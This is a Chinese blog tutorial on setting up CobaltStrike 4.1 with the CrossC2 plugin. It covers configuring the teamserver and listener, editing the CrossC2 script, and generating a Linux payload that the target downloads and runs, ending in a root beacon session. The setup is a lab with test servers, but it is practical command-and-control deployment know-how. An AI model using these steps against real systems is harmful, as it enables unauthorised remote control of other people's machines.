CobaltStrike4.1+CrossC2安装+上线Linux

cs客户端:Windows10;

服务器端:腾讯云服务器 Ubuntu20;ip 1.1.1.1 (假的)

测试靶机:腾讯云服务器-CentOS 7

 下载CrossC2

GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload

将src目录复制到win10客户端cs目录下

下载插件

https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Linux https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Win.zip

将genCrossC2.Linux文件上传到ubuntu服务器根目录下(有点文章说要的我就试着放上去先,反正也不差这点)

再将服务器端 隐藏文件.cobaltstrike.beacon_keys复制到客户端,ls -a 查看

解压genCrossC2.Win.zip文件,复制ucrtbased.dll到C:\Windows\System32目录下

编辑src下CrossC2.cna文件:

$CC2_PATH = "D:\\Tools\\CobaltStrike4.1\\src\\"; # <-------- fix   更改为CrossC2.cna存放的绝对路径
$CC2_BIN = "genCrossC2.Win.exe";                 #客户端使用的win10改成对应文件
sub genCrossC2 {     
        $dialog = dialog("CrossC2 Payload Generator", %(uri => "/a", lport => "55413", type => "curl", beaconKey => "./.cobaltstrike.beacon_keys", rebind_lib => "null", listener => "Listener: ", system => "System: ", arch => "Arch: ", payload_type => "Payload_Type: ", outputFileName => "CrossC2-test"), &dialogCallBack);
         #第212行 将最后的 outputFileName => "/tmp/CrossC2-test"改为 outputFileName => "CrossC2-test"
         #windows10不存在tmp目录所以将cs直接生成木马文件在根目录下

ubuntu@VM-0-9-ubuntu:~/CobaltStrike4.1$ ls -a
.   agscript      c2lint      cobaltstrike       cobaltstrike.bat           CobaltStrikeCN.jar  cobaltstrike.store  genCrossC2.Linux  peclone      teamserver      third-party
..  agscript.bat  c2lint.bat  cobaltstrike.auth  .cobaltstrike.beacon_keys  cobaltstrike.jar    data                logs              peclone.bat  teamserver.bat

CobaltStrike启动!!!

服务器启动:chmod +x teamserver #第一次启动给予权限

                sudo ./teamserver 1.1.1.1 password

                [*] Will use existing X509 certificate and keystore (for SSL)

                [+] Team server is up on 50050

                [*] SHA256 hash of SSL cert is:                 57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c

                [!] Web Server will use default SSL certificate (you don't want this).

                        Use a valid SSL certificate with Cobalt Strike: https://www.cobaltstrike.com/help-malleable-c2#validssl

                [+] Listener: cs4.1 started!

客户端启动:双击cobaltstrike.bat文件一键启动

主机为服务器端地址,端口默认50050,用户名随便写,密码就刚刚写的password

右上角cobaltstrike -监听器 -最下面点击add添加监听器,因为CrossC2 listener 只支持https的

 cobalt strike -脚本管理器 - load CrossC2.cna文件名

 这时客户端顶上面会出现CrossC2按钮

点击CrossC2 -CrossC2 Payload Generator -genCrossC2 生成payload

第四行选择文件,选择cobaltstrike.beacon_keys的存放路径,listener改为刚刚添加的https监听器,Bulid生成

 复制语句到靶机执行

靶机自动下载并执行

查看日志,上线成功

08/10 11:58:56 *** new ssh session root *@10.0.4.7 (VM-4-7-centos(23687))

完成

进入beacon

ssh> sleep 0

[*] Tasked beacon to become interactive

[+] host called home, sent: 16 bytes

ssh> shell id

[*] Tasked session to run: id

[+] host called home, sent: 11 bytes

[+] received output:

uid=0(root) gid=0(root) 组=0(root)

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值